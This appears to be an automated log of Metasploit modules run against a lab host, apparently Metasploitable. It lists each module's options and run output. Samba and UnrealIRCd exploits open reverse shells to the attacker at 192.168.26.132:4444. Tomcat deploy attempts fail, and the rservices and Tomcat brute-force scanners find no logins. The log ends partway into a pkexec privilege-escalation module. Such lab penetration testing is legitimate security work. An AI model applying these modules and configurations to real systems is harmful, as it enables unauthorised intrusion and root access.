Exploit auxiliary/scanner/http/ssl_version for CVE 2014-3566 Name: HTTP SSL/

1.  
2.  
3. Exploit auxiliary/scanner/http/ssl_version for CVE 2014-3566 Name: HTTP SSL/TLS Version Detection (POODLE scanner) Module: auxiliary/scanner/http/ssl_version License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2014-10-14 Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 443 yes The target port SSL true no Negotiate SSL/TLS for outgoing connections SSLVersion Auto no Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1, TLS1.2) THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host Description: Check if an HTTP server supports a given version of SSL/TLS. If a web server can successfully establish an SSLv3 session, it is likely to be vulnerable to the POODLE attack described on October 14, 2014, as a patch against the attack is unlikely. References: http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html http://www.osvdb.org/113251 http://cvedetails.com/cve/2014-3566/ Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
4.  
5. Exploit exploit/multi/samba/usermap_script for CVE 2007-2447 Name: Samba "username map script" Command Execution Module: exploit/multi/samba/usermap_script Platform: Unix Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2007-05-14 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.26.134 yes The target address RPORT 139 yes The target port Payload information: Space: 1024 Description: This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! References: http://cvedetails.com/cve/2007-2447/ http://www.osvdb.org/34700 http://www.securityfocus.com/bid/23972 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534 http://samba.org/samba/security/CVE-2007-2447.html Started reverse TCP double handler on 192.168.26.132:4444 Accepted the first client connection... Accepted the second client connection... Command: echo 4tBUZ57jKoufw6Hh; Writing to socket A Writing to socket B Reading from sockets... Reading from socket B B: "4tBUZ57jKoufw6Hh\r\n" Matching... A is input... Command shell session 1 opened (192.168.26.132:4444 -> 192.168.26.134:33595) at 2016-05-31 16:51:30 +0100 Session 1 created in the background.
6.  
7. Exploit auxiliary/scanner/nfs/nfsmount for CVE 1999-0170 Name: NFS Mount Scanner Module: auxiliary/scanner/nfs/nfsmount License: Metasploit Framework License (BSD) Rank: Normal Provided by: tebo Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PROTOCOL udp yes The protocol to use (Accepted: udp, tcp) RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 111 yes The target port THREADS 1 yes The number of concurrent threads Description: This module scans NFS mounts and their permissions. References: http://cvedetails.com/cve/1999-0170/ http://www.ietf.org/rfc/rfc1094.txt 192.168.26.134:111 - 192.168.26.134 NFS Export: / [*] 192.168.26.134:111 - Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
8.  
9. Exploit auxiliary/scanner/rservices/rlogin_login for CVE 1999-0651 Name: rlogin Authentication Scanner Module: auxiliary/scanner/rservices/rlogin_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS true no Add all passwords in the current database to the list DB_ALL_USERS true no Add all users in the current database to the list FROMUSER no The username to login from FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt no File containing from usernames, one per line PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 513 yes The target port SPEED 9600 yes The terminal speed desired STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TERM vt100 yes The terminal type desired THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Description: This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ 192.168.26.134:513 - 192.168.26.134:513 - Starting rlogin sweep 192.168.26.134:513 - Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
10.  
11. Exploit auxiliary/scanner/rservices/rsh_login for CVE 1999-0651 Name: rsh Authentication Scanner Module: auxiliary/scanner/rservices/rsh_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS true no Add all passwords in the current database to the list DB_ALL_USERS true no Add all users in the current database to the list ENABLE_STDERR false yes Enables connecting the stderr port FROMUSER no The username to login from FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt no File containing from usernames, one per line PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 514 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Description: This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ 192.168.26.134:514 - 192.168.26.134:514 - Starting rsh sweep 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'root' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'daemon' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'bin' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'nobody' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from '+' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'guest' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'mail' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
12.  
13. Exploit auxiliary/scanner/rservices/rexec_login for CVE 1999-0651 Name: rexec Authentication Scanner Module: auxiliary/scanner/rservices/rexec_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS true no Add all passwords in the current database to the list DB_ALL_USERS true no Add all users in the current database to the list ENABLE_STDERR false yes Enables connecting the stderr port PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 512 yes The target port STDERR_PORT no The port to listen on for stderr STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Description: This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ 192.168.26.134:512 - 192.168.26.134:512 - Starting rexec sweep 192.168.26.134:512 - Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
14.  
15. Exploit exploit/unix/irc/unreal_ircd_3281_backdoor for CVE 2010-2075 Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution Module: exploit/unix/irc/unreal_ircd_3281_backdoor Platform: Unix Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2010-06-12 Provided by: hdm Available targets: Id Name -- ---- 0 Automatic Target Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.26.134 yes The target address RPORT 6667 yes The target port Payload information: Space: 1024 Description: This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. References: http://cvedetails.com/cve/2010-2075/ http://www.osvdb.org/65445 http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt Started reverse TCP double handler on 192.168.26.132:4444 192.168.26.134:6667 - Connected to 192.168.26.134:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached) 192.168.26.134:6667 - Sending backdoor command... Accepted the first client connection... Accepted the second client connection... Command: echo fZiSmZsm5BJR9h4J; Writing to socket A Writing to socket B Reading from sockets... Reading from socket B B: "fZiSmZsm5BJR9h4J\r\n" Matching... A is input... Command shell session 2 opened (192.168.26.132:4444 -> 192.168.26.134:33597) at 2016-05-31 16:52:11 +0100 Session 2 created in the background.
16.  
17. Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2009-3548 Name: Tomcat Application Manager Login Utility Module: auxiliary/scanner/http/tomcat_mgr_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC Matteo Cantoni jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS true no Add all passwords in the current database to the list DB_ALL_USERS true no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 8080 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://www.securityfocus.com/bid/37086 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html http://www.zerodayinitiative.com/advisories/ZDI-09-085 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/ http://cvedetails.com/cve/1999-0502/ 192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080). Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
18.  
19. Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2009-3548 Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution Module: exploit/multi/http/tomcat_mgr_deploy Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic 1 Java Universal 2 Windows Universal 3 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. Exploit completed, but no session was created.
20.  
21. Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2009-3548 Name: Apache Tomcat Manager Authenticated Upload Code Execution Module: exploit/multi/http/tomcat_mgr_upload Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: rangercha Available targets: Id Name -- ---- 0 Java Universal 1 Windows Universal 2 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. Exploit completed, but no session was created.
22.  
23. Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-0557 Name: Tomcat Application Manager Login Utility Module: auxiliary/scanner/http/tomcat_mgr_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC Matteo Cantoni jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS true no Add all passwords in the current database to the list DB_ALL_USERS true no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 8080 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://www.securityfocus.com/bid/37086 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html http://www.zerodayinitiative.com/advisories/ZDI-09-085 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/ http://cvedetails.com/cve/1999-0502/ 192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080). Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
24.  
25. Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-0557 Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution Module: exploit/multi/http/tomcat_mgr_deploy Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic 1 Java Universal 2 Windows Universal 3 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. Exploit completed, but no session was created.
26.  
27. Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-0557 Name: Apache Tomcat Manager Authenticated Upload Code Execution Module: exploit/multi/http/tomcat_mgr_upload Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: rangercha Available targets: Id Name -- ---- 0 Java Universal 1 Windows Universal 2 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. Exploit completed, but no session was created.
28.  
29. Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-4094 Name: Tomcat Application Manager Login Utility Module: auxiliary/scanner/http/tomcat_mgr_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC Matteo Cantoni jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS true no Add all passwords in the current database to the list DB_ALL_USERS true no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 8080 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://www.securityfocus.com/bid/37086 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html http://www.zerodayinitiative.com/advisories/ZDI-09-085 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/ http://cvedetails.com/cve/1999-0502/ 192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080). Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
30.  
31. Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-4094 Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution Module: exploit/multi/http/tomcat_mgr_deploy Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic 1 Java Universal 2 Windows Universal 3 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. Exploit completed, but no session was created.
32.  
33. Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-4094 Name: Apache Tomcat Manager Authenticated Upload Code Execution Module: exploit/multi/http/tomcat_mgr_upload Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: rangercha Available targets: Id Name -- ---- 0 Java Universal 1 Windows Universal 2 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. Exploit completed, but no session was created.
34.  
35. PostExploit: exploit/linux/local/pkexec Name: Linux PolicyKit Race Condition Privilege Escalation Module: exploit/linux/local/pkexec Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2011-04-01 Provided by: xi4oyu 0a29406d9794e4f9b30b3c5d6702c708 Available targets: Id Name -- ---- 0 Linux x86 1 Linux x64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Count 500 yes Number of attempts to win the race condition DEBUG_EXPLOIT false yes Make the exploit executable be verbose about what it's doing ListenerTimeout 60 yes Number of seconds to wait for the exploit SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: A race condition flaw was found in the PolicyKit pkexec utility and polkitd daemon. A local user could use this flaw to appear as a privileged user to pkexec, allowing them to execute arbitrary commands as root by running those commands with pkexec. Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1 (9.10) References: 